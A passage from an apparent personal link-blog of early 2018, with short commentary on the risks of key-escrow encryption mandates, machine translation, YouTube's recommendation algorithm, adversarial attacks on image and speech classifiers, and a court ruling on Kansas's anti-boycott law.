(B) The organization charged with the responsibilities of escrow will find it difficult to reliably distinguish authentic requests for access to escrowed information from requests generated by attackers, particularly since counterterrorism and law-enforcement officials are likely to grow impatient with strict authentication procedures and look for ways to bypass them even when making legitimate requests.

(C) Attackers, knowing that a device uses an escrowed-key encryption mechanism, will seek out vulnerabilities related to the implementation of this mechanism:

The information the attacker obtains from the device could then be sold or otherwise exploited. That is, compromised devices would lead to identity theft, intellectual property misappropriation, industrial espionage, and other economic harms to American individuals and businesses. These are the very harms from which phone manufacturers are presently protecting Americans by strengthening their device encryption in recent years. An exceptional-access mandate would not only hurt U.S. smartphone manufacturers and app makers, it would end up taking a toll on other people and industries as well.

The premise is that end-to-end encryption systems are not subject to these particular vulnerabilities because they do not provide the access mechanisms (and so do not contain the hardware or software support) in which the vulnerabilities would be found.

(D) Users who want to protect their information can apply a second level of encryption, using a different key, before turning it over to the application that escrows its key, or use other techniques (such as steganography) to conceal information. Alternatively, such users can switch to apps made in free countries or develop their own, using free-software libraries that are already widely available. Any of these approaches would render the escrowed-key system pointless.

If the most commonly-used devices or messaging apps are exceptional access-compliant, then not only will the majority of bad actors — the average, unsophisticated criminals — be using weakened encryption, so will the majority of innocent people. By imposing an exceptional-access mandate, law enforcement officials charged with protecting the public would create a world wherein the shrewdest wrongdoers have better security than the innocents they victimize, who, in turn, would by law have worse smartphone and communications security than they do now, leaving them even more vulnerable to those same criminals.

“The Risks of ‘Responsible Encryption’”
Riana Pfefferkorn, Stanford Center for Internet and Society, February 5, 2018
https://cyberlaw.stanford.edu/files/publication/files/2018-02-05%20Technical%20Response%20to%20Rosenstein-Wray%20FINAL.pdf

#encryption #key-escrow #communications-security

The Role of Understanding in Translation

2018-02-05⊺14:35:17-06:00

The cognitive scientist Douglas R. Hofstadter has argued for many years that effective translation of any but the most pedestrian and constrained texts requires that the translator understand the text, its context, and its purpose. In this article, he reviews the current performance of Google Translate and concludes that massive text databases and machine-learning algorithms don't simulate this understanding well.

“The Shallowness of Google Translate”
Douglas Hofstadter, The Atlantic, January 30, 2018
https://www.theatlantic.com/technology/archive/2018/01/the-shallowness-of-google-translate/551570/

In Language Log, a professional Sinologist does a slightly deeper dive into one of Hofstadter's examples and suggests that Hofstadter is attacking a straw man.

“Don't Blame Google Translate”
Victor Mair, Language Log, February 4, 2018
http://languagelog.ldc.upenn.edu/nll/?p=36502

It is easy to find inadequacies in the GT translations, and Hofstadter does so systematically, but I don't think anyone in their right mind would expect a machine to do as good a job as a skilled, experienced, sensitive, creative human translator who knows both the source language and the target language well.

If GT and other machine translators are unable to do a perfect job, or even one that is close to what a skilled human translator is capable of, what are their purposes? I believe that they fulfill a useful function in giving us the gist of meaning of texts written in languages with which we are unfamiliar.

In defense of Hofstadter, I note that what prompted his investigation was his discovery that two of his friends, each fluent in the other's native language, nevertheless used Google Translate as an intermediary when corresponding by e-mail: They each wrote in their native language, fed the result through Google Translate, and sent off the result.

Hofstadter commented:

How odd! Why would two intelligent people, each of whom spoke the other's language well, do this? My own experiences with machine-translation software had always led me to be highly skeptical about it. But my skepticism was clearly not shared by these two. Indeed, many thoughtful people are quite enamored of translation programs, finding little to criticize in them. This baffles me.

All of his examples are cases in which the machine-translation system has failed to render the main point of the passage, what Mair calls “the gist,” because it doesn't understand the passage. They are cases in which the system fails even at the minimal “useful function” that Mair identifies.

#machine-translation #Douglas-Hofstadter #Google-Translate

YouTube Gone Wild

2018-02-03⊺08:51:58-06:00

In the absence of explicit guidance from the user, the black-box decider inside YouTube that chooses and queues up the videos that it fancies you'll be most interested in seeing next tends to make recommendations that are progressively more bizarre and disturbing. Perhaps it has learned something about human nature, but more likely its selections are the video-recommender analogue of the luridly colored fantasy images that a black-box classifier constructs when directed to search for the pixel pattern that maximizes its response to a given search term such as “octopus” or “mouth” or “waterfall”.

This writer suspects that the black-box decider's behavior reflects something sinister in its programming. It turns out that many of the bizarre and disturbing videos that the decider eventually queues up, not too surprisingly, are pro-Trump ads and right-wing loons promoting conspiracy theories.

“‘Fiction Is Outperforming Reality’: How YouTube's Algorithm Distorts Truth”
Paul Lewis, The Guardian, February 2, 2018
https://www.theguardian.com/technology/2018/feb/02/how-youtubes-algorithm-distorts-truth

#black-box-deciders #YouTube #recommendation-systems

Defenses against Adversarial Examples Fail

2018-02-02⊺17:21:09-06:00

Several of the papers to be presented at this year's International Conference on Learning Representations propose strategies for blocking the construction of adversarial examples against machine-learning-based image-classification systems. The goal is to harden such systems enough to make them usable even in high-risk situations in which adversaries can select and control the inputs that the fully trained systems are expected to classify.

Once these post hoc defenses are incorporated into the systems, however, it is possible to devise more specialized attacks against them, resulting in new, even more robust adversarial examples:

“Obfuscated Gradients Give a False Sense of Security: Circumventing Defenses to Adversarial Examples”
Anish Athalye, Nicholas Carlini, and David Wagner, arXiv, February 1, 2018
https://arxiv.org/pdf/1802.00420.pdf

That's the full paper. If it's tl;dr, there's a summary here, with a cat picture that even well-defended classifiers consider to be guacamole.

“Obfuscated Gradients Give a False Sense of Security: Circumventing Defenses to Adversarial Examples”
Anish Athalye, Nicholas Carlini, and David Wagner, GitHub, February 2, 2018
https://github.com/anishathalye/obfuscated-gradients

#adversarial-examples #image-classifiers #machine-learning

Adversarial Speech-to-Text Examples: a Linguist's View

2018-02-02⊺16:24:18-06:00

A professional linguist examines a recent paper dealing with adversarial examples against speech-to-text systems created by machine-learning techniques. His conclusion is that, for some applications, the existence of adversarial examples won't make any difference, but they show that the speech-to-text systems are “brittle” and hence unsuitable in applications requiring any kind of fine discrimination or nonstandard input.

“Adversarial Attacks on Modern Speech-to-Text”
Max Little, Language Log, January 30, 2018
http://languagelog.ldc.upenn.edu/nll/?p=36447

For many commercial STT and associated user-centric applications this is mostly a curiosity. If I can order pizza and nearly always get it right in one take through Siri, I don't really see the problem here, even if it is obviously highly brittle. …

Nonetheless, I think this brittleness does have consequences. There will be critical uses for which this technology simply can't work. Specialised dictionaries may exist (e.g. clinical terminology) for which it may be almost impossible to obtain sufficient training data to make it useful. Poorly represented minority accents may cause it to fail. Stroke survivors and those with voice or speech impairments may be unable to use them. And there are attacks … in which a device is hacked remotely.

#speech-to-text #adversarial-examples #computational-linguistics

Kansas May Not Penalize Holders of Pro-Palestinian Opinions

2018-02-01⊺17:22:35-06:00

Good news! Some federal judges are still acquainted with the Constitution!

“In a Major Free Speech Victory, a Federal Court Strikes Down a Law That Punishes Supporters of Israel Boycott”
Glenn Greenwald, The Intercept, January 31, 2018
https://theintercept.com/2018/01/31/kansas-bds-law-free-speech/

The enjoined law, enacted last year by the Kansas legislature, requires all state contractors — as a prerequisite to receiving any paid work from the state — “to certify that they are not engaged in a boycott of Israel.” The month before the law was implemented, Esther Koontz, a Mennonite who works as a curriculum teacher for the Kansas public school system, decided that she would boycott goods made in Israel, motivated in part by a file she had seen detailing the abuse of Palestinians by the occupying Israeli government, and in part by a resolution enacted by the national Mennonite Church. …

A month after this law become effective, Koontz, having just completed a training program to teach new courses, was offered a position at a new Kansas school. But, as the court recounts, “the program director asked Ms. Koontz to sign a certification confirming that she was not participating in a boycott of Israel, as the Kansas Law requires.” Koontz ultimately replied that she was unable and unwilling to sign such an oath because she is, in fact, participating in a boycott of Israel. As a result, she was told that no contract could be signed with her.

In response to being denied this job due to her political views, Koontz retained the American Civil Liberties Union, which sued the commissioner of education, asking a federal court to enjoin enforcement of the law on the grounds that denying Koontz a job due to her boycotting of Israel violates her First Amendment rights. The court on Tuesday agreed and preliminarily enjoined enforcement of the law.

#freedom-of-speech #Boycott-Divestment-and-Sanctions #Kansas

Hashtag index

This work is licensed under a Creative Commons Attribution-ShareAlike License.

Atom feed

John David Stone (havgl@unity.homelinux.net)

created June 1, 2014 · last revised December 10, 2018